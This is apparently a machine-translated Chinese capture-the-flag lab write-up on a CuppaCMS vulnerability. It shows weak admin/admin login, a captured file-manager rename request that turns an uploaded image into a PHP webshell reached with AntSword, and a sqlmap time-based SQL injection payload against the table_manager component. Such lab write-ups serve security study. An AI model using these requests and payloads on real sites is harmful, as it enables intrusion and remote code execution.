CVE(cve漏洞库)

CVE简介
CuppaCMS是一套内容管理系统(CMS)。 CuppaCMS 2019-11-12之前版本存在安全漏洞,攻击者可利用该漏洞在图像扩展内上传恶意文件,通过使用文件管理器

简介

CuppaCMS 是一个内容管理系统(CMS)。 2019 年11 月12 日之前的CuppaCMS 版本包含一个安全漏洞,攻击者可能会利用该漏洞使用文件管理器提供的重命名功能的自定义请求来上传扩展程序中的恶意文件。 PHP可能导致远程任意代码执行。

/components/table_manager/路径下存在SQL注入

过程

开放范围

登录后台admin/admin的弱密码

找到文件上传位置并允许仅上传图片

上传后,将文件后缀更改为php并抓包。

抓包数据如下

POST /js/filemanager/api/index.php HTTP/1.1

主机: eci-2ze48eddxtrl7tgppkyz.cloudec1.ichunqiu.com

用户代理: Mozilla/5.0(Windows NT 10.0;Win64;x64;rv:127.0)Gecko/20100101 Firefox/127.0

接受: */*

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip、deflate

Referer: http://eci-2ze48eddxtrl7tgppkyz.cloudec1.ichunqiu.com/js/filemanager/index.php

内容类型: 应用程序/json

内容长度: 59

来源: http://eci-2ze48eddxtrl7tgppkyz.cloudec1.ichunqiu.com

关闭连接:

Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1718849866,1718896116,1719242501,1719395363;chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O;会话=6 88e0a110412c17b0a7e0a5ad4cdf894cf99798b; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1719395439; PHPSESSID=0rvs895vqjskasibtu khf8m0 a2; 2F%2Feci-2ze48eddxtrl7tgppkyz.cloudec1.ichunqiu.com%2F管理员_文档_路径=%2F;

优先级: u=1

{\’from\’:\’//asd.php.png\’,\’to\’:\’//asd.php\’,\’action\’:\’重命名\’}

修改成功后,放入包中。更改成功后,删除.htaccess 文件,然后使用Ant Sword 进行连接。

获取标志{047b0831-949e-41f3-84f1-49859eb6bebf}

附加

在测试过程中,我们还发现存在SQL注入漏洞。

查找并搜索权限-分组并抓包

抓包数据如下

POST /components/table_manager/HTTP/1.1

主机: eci-2ze48eddxtrl7tgppkyz.cloudec1.ichunqiu.com

用户代理: Mozilla/5.0(Windows NT 10.0;Win64;x64;rv:127.0)Gecko/20100101 Firefox/127.0

接受: */*

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip、deflate

Content-Type: application/x-www-form-urlencoded; 字符集=UTF-8

X-Requested-With: XMLHttpRequest

内容长度: 150

来源: http://eci-2ze48eddxtrl7tgppkyz.cloudec1.ichunqiu.com

关闭连接:

Referer: http://eci-2ze48eddxtrl7tgppkyz.cloudec1.ichunqiu.com/

Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1718849866,1718896116,1719242501,1719395363; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; 688e0a110412c17b0a7e0a5ad4cdf894cf99798b; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1719395439; PHPSESSID=0rvs895vqjskasibtu khf8m0 a2; A%2F%2Feci-2ze48eddxtrl7tgppkyz.cloudec1.ichunqiu.com%2F管理员_文档_路径=%2F;

优先级: u=1

search_word=123filter_lang=order_by=idorder_orientation=ASCpath=组件%2Ftable_manager%2Fview%2Fcu_menusuniqueClass=wrapper_content_897880

扔进sqlmap并运行

获取有效负载

search_word=123filter_lang=\’ AND (SELECT 5543 FROM (SELECT(SLEEP(5)))JJri) AND \’XiZL\’=\’XiZLorder_by=idorder_orientation=ASCpath=component/table_manager/view/cu_menusuniqueClass=wrapper_content_897880

已发布的数据库有:

炸药

由于未找到该标志,测试未继续。

以上有关#CVE的相关内容来源仅供参考。相关信息请参见官方公告。

原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/92267.html

(0)
CSDN's avatarCSDN
上一篇 2024年6月26日 下午11:39
下一篇 2024年6月26日 下午11:39

相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注